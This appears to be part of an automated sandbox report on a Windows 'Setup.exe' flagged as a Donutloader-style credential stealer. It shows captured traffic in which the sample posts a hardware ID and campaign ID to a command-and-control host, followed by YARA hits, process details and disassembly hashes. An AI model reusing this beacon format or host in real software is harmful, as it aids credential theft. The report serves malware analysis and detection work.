                                                                                                                                      2024-12-30 20:29:31 UTC15331OUTData Raw: ea 16 64 f3 cf 55 df 3f 7c 4b 82 b0 dd 28 80 db 0b 91 f9 a1 8c 3d d1 43 b1 f9 46 76 28 18 0e b3 dd bd cd d2 9f b3 6e fd 0c ae 0f e1 e5 4e 61 d9 05 d9 47 f7 4b 33 6f 35 a8 d9 9c 46 d6 36 c6 7d 7f e9 9b e3 a5 00 f6 e0 39 01 91 55 8b 31 52 27 9d 7c b9 1f 9a 5d 1d 64 69 45 13 16 fc 64 71 ce e3 af e6 b7 01 7e 02 f1 d7 08 31 08 17 8c db fa f5 ec d2 68 92 08 c5 17 32 77 cc cf 40 c8 3c ac 17 dd 21 d8 94 a5 75 08 1c b6 4e af ad 31 5a 0d 4c 6b 42 9b 96 62 f8 e9 8d 3c 14 73 93 62 ee 79 96 b5 9e f4 e9 7a 1a 2f 98 dc 40 cf d8 81 a6 5f c2 1a 0b 94 d7 49 b5 b2 e9 8a f5 81 b2 22 63 3a 6f 94 13 c3 bd a5 98 cd 2a f3 de ae 88 6f fa ad 4a 0f c5 73 1e 5c e3 b7 00 ec 5c 14 21 76 41 33 9a 06 68 46 3c 77 e8 3f bb f3 05 56 d5 41 87 7b 1c d6 55 70 41 6b a6 6e 0b b5 aa b4 f4 b5 5b
                                                                                                                                      Data Ascii: dU?|K(=CFv(nNaGK3o5F6}9U1R'|]diEdq~1h2w@<!uN1ZLkBb<sbyz/@_I"c:o*oJs\\!vA3hF<w?VA{UpAkn[
                                                                                                                                      2024-12-30 20:29:32 UTC1137INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 30 Dec 2024 20:29:32 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=5ilsa4s8hs9g0k7v3j7lcppfos; expires=Fri, 25 Apr 2025 14:16:11 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gEtctKBJ712bFdRKs32%2FHyDpRgWKbLzl1sG7LG5v7oho4CQZc82QdoDsAmBm0TiY9PWyDyr7hjoBRLvT2J1MaevFhUhc3nmJM99iTJvaqHLKZwm3BU%2BjQP5Do5sTx%2BWABZuG%2BjQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8fa4c84e59c14340-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1634&rtt_var=625&sent=311&recv=590&lost=0&retrans=0&sent_bytes=2843&recv_bytes=573213&delivery_rate=1734997&cwnd=217&unsent_bytes=0&cid=aa5c99024d4538ab&ts=1836&x=0"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.449746172.67.177.884437412C:\Users\user\Desktop\Setup.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 20:29:33 UTC355OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Cookie: __cf_mw_byp=4ES7po80595fIjJPhQxgt5vlBy1.qekvq8p3kvm4hDY-1735590551-0.0.1.1-/api
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 77
                                                                                                                                      Host: cheapptaxysu.click
                                                                                                                                      2024-12-30 20:29:33 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 26 6a 3d 26 68 77 69 64 3d 32 32 37 37 33 43 33 31 34 35 35 32 32 43 46 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
                                                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=CZJvss--&j=&hwid=22773C3145522CFCBEBA0C6A975F1733
                                                                                                                                      2024-12-30 20:29:33 UTC1130INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 30 Dec 2024 20:29:33 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=phu96gfh6n0odjno9k1uafqhn6; expires=Fri, 25 Apr 2025 14:16:12 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ucqB0i8u4AP%2FPWOjE9RtNdmzy6%2Fp9Cm1Ku7fvHBzhT0RK7Pf5HYozbWKG9F4sCh6pxhNDZPriqeV%2Bka4Q7gxrEEbKCZQttawHzyeamRzTYVxpYUfwTv6otPbnPEdaPhS%2Bu5XV50%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8fa4c85cccae43e0-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2200&min_rtt=2070&rtt_var=869&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1068&delivery_rate=1410628&cwnd=247&unsent_bytes=0&cid=b10a9ae608a9b0f2&ts=526&x=0"
                                                                                                                                      2024-12-30 20:29:33 UTC54INData Raw: 33 30 0d 0a 4a 31 4d 76 37 73 59 77 44 73 63 45 34 78 6e 43 78 69 6b 34 4b 57 38 75 73 70 7a 6b 64 43 7a 38 64 4f 6a 2f 36 36 53 68 50 77 52 38 44 67 3d 3d 0d 0a
                                                                                                                                      Data Ascii: 30J1Mv7sYwDscE4xnCxik4KW8uspzkdCz8dOj/66ShPwR8Dg==
                                                                                                                                      2024-12-30 20:29:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Click to jump to process

                                                                                                                                      Click to jump to process

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:15:28:54
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:3'317'708 bytes
                                                                                                                                      MD5 hash:79D5CC6637E2C1502789C2D7D610916C
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1994725877.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Reset < >
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000003.2013943764.000000000311D000.00000004.00000800.00020000.00000000.sdmp, Offset: 0311D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_3_311d000_Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4ES7
                                                                                                                                        • API String ID: 0-24597593
                                                                                                                                        • Opcode ID: ed83a25f40fbe8b11734d6492efdcec3c20b66ac55c3affd8639a891ac5e2457
                                                                                                                                        • Instruction ID: 74637d911d7ba490abcd22c447c14a4c6f9a12cca128e367a9ad371fd4bb6574
                                                                                                                                        • Opcode Fuzzy Hash: ed83a25f40fbe8b11734d6492efdcec3c20b66ac55c3affd8639a891ac5e2457
                                                                                                                                        • Instruction Fuzzy Hash: 3202376144E7E15FD7138B749C65AA63FB5AF07224B0E05EBD4C1CF0A7E228491ACB63
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000003.2013943764.000000000311D000.00000004.00000800.00020000.00000000.sdmp, Offset: 0311D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_3_311d000_Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4ES7
                                                                                                                                        • API String ID: 0-24597593
                                                                                                                                        • Opcode ID: 26c52d808437fdbf4f789addc40db53111cbcf72aa00d328591f5b4e371fd649
                                                                                                                                        • Instruction ID: 916bf0da8466b73784a7ff0393f81252bd6829f037f079dea5ccfcede9b540cd
                                                                                                                                        • Opcode Fuzzy Hash: 26c52d808437fdbf4f789addc40db53111cbcf72aa00d328591f5b4e371fd649
                                                                                                                                        • Instruction Fuzzy Hash: 70B1336144E7D15FD7138B349865A967FB1AF07224B0F0AEBD4C1CF0A7E229491ACB63